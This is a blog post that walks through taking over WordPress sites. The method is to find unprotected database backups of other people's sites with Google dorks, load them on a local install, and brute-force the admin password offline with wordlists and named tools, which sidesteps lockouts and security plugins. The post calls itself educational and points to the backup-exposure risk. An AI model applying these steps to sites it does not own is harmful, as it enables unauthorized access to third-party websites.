Hacking website locally with brute-force attack

Hacking website with brute-force type attack on a local machine

I have already written about the danger to your website caused by insecurely stored back up files. However, it was a case when I was able to find FTP credentials used by Updraft backup WordPress plugin stored in the back up of the database. I think this is the most straightforward hacking technique ever and it doesn’t require specialised knowledge or software to perform the hack. But today I will tell you about the more sophisticated method.

So, let’s begin with the very first step of this hacking method. As I mentioned in the previous post, some Google dorks could lead you to websites with unprotected backup files due to the open directory listing. Trust me, there are hundreds if not thousands of such sites, and you can find them by applying various dorks since various WordPress backup plugins have different file naming scheme.

Insecure WordPress backup files

OK, now when you have a potential list of vulnerable websites, it’s time to pick up one and proceed with other steps. We are looking for sites with backups of the database which you can use on your local machine. Download the WordPress database file, and you’re ready to start the hack.

Preparation

As you may know, propper WordPress install makes some hashing to encrypt passwords before storing them in the database. You can’t simply decrypt this hash since it is salted. WordPress uses additional unique SALT keys stored in wp-config.php file. These keys are used to make the decryption of password hash almost impossible. Moreover, I bet it’s almost impossible to find the corresponding hash in any hash library because these libraries include only unsalted hashes. So you need a workaround and brute-force the password. And the funniest thing is that you can brute-force website locally. Example of SALT keys:

define('AUTH_KEY',         'Dp?:L)G>Vrz/-M2.Xqw:@PX]K kijK-}&NwNq_q[[a dK|K^SJ$m!A`X|9xB|^Q=');
define('SECURE_AUTH_KEY',  'zC+&YDCbGE!A4-tuS^q8I^lz?<hp+/r.IFs@n+QBnSb^rLH45 TDvsKl3dp1(o9E');
define('LOGGED_IN_KEY',    '5(ls-Zmzk{0rRC.YB?!l,#IAHn;7-`7?(Td<]ufxj#6]`{/!-rSI9bg|~J{z;~*e');
define('NONCE_KEY',        ':Gt_RhK_ |/=Eo-6@7f3EY<ntxm3yeH1n~)7GlHedY7n{YT[gVU?G(u!hj.DmNZr');
define('AUTH_SALT',        '#Rw{<Oo!`:vofdKZXWg/bZK7 I.{x#ASweWKt |~]MYT9zR-Q9O/n)b4D;|.:H~6');
define('SECURE_AUTH_SALT', 'BWLfs@Sp!#Ky>m*I&7`j)cci|h$Rjtc>L%IZ5m0fac^hHz-qdmGE`2+Z)O&y#),w');
define('LOGGED_IN_SALT',   'lnF= `OyZk66W5u%U2o[MtTOX4+Z+G!C/zZ+ 5b=uoDbp/IW,~qC}wB3>vaw3? G');
define('NONCE_SALT',       'O8Id l=fOxM.n)t9b6V5^WWacgs{H^BVr@/u7_t)i/NPzH@4>=9X4*~}8R*$-u4d');

The main benefit of brute-forcing on the local machine is that you can avoid any plugins or other solutions that normally would be the pain in the ass. Various WordPress plugins offer anti-brute-force features like Turing tests (CAPTCHA/reCAPTCHA), login attempts with IP lockouts, IP restricted access to the wp-login.php or even non-standard URL for login form. But since we have the database file, we can forget those restricting options.

What’s next? Well, now you need to install MAMP, XAMMP or other similar software to be able to run WordPress install locally on your PC. Create an empty database for your hacking experiment and import the database backup file, use the phpMyAdmin or if necessary the same plugin that generated the backup file. Yes, you need to make some changes in this database like the site address. The primary goal is to make the WordPress login form accessible on the local host install. Your local install will be free of security plugins (sorry WordFence, you can’t protect the site if you’re not protecting backup files), security-oriented .htaccess files (with special rules to restrict the access to the login form to anyone) and other stuff that could ruin your brute-force experience.

Hacking website on local machine

Finally, you have the website running on your PC. It’s not protected in any way. You can’t leave any evidence on the real site since it’s your local install (you even don’t need an internet connection) and you know the username (you can look for it in the database). Brute-forcing manually is not a smart thing, and you need something that could make it for you at a very high rate.

There are various brute-force software tools available on the Internet, and it’s your choice what to prefer to use. You can search those available software tools on Google, but keep in mind that more sophisticated tools require additional setup. WPScan, WPForce, Burp, Metasploit, OWASP ZAP, Wordbrutepress and more tools are suitable for this task.

The last thing that you need before you proceed with the brute-force attack is a word list – the database or plain text file with lots and lots of passwords. More advanced tools could run the linear password guessing sequence by generating one by one all possible versions of passwords from the specified character space, but this method is not efficient, and I would recommend you to concentrate on the first option, to use the collections of passwords.

Now you’re ready to make the brute-force hack, just launch your prefered software, set it up with all data you have (at least username) and start the attack. Since it will run entirely on your local machine it will reach out higher password guessing speed, you can make this attack more efficient by exploiting WordPress XML-RPC protocol, but don’t forget that you are guessing and it requires some time to reach up to the result. If it fails, try other word lists and password databases. Here you can see the video example made by HomeLab IT:

Possible problems

Several things could make the guessing impossible, like a very strong password. For example, you’re looking for the password in the wrong character space. Don’t think that everyone makes their passwords out of Latin letters, numbers and extra symbols. If the password has extra letters available only in specific languages, then you’re screwed. You can’t guess the password if you’re not using those specific letters. Also, it could be very long and tricky passwords that are not available in the password databases. Still, you have an opportunity to reach the goal by applying more advanced methods.

Conclusion

Let’s assume you guessed the password. What’s next? I don’t think I need to tell you what you can make with the WordPress administrator password, and it’s your choice. You can be a supercool hero that shows the security issue to the owner of the website, or you can go to the dark side, start hacking the real site and make some standard stuff what hackers usually do.

I published this post purely for educational purposes, and my goal is to show where the security problem is. And today I showed another way how hackers could hack almost any WordPress website which leaks the backup files of its database.

Leave a Reply

Your email address will not be published. Required fields are marked *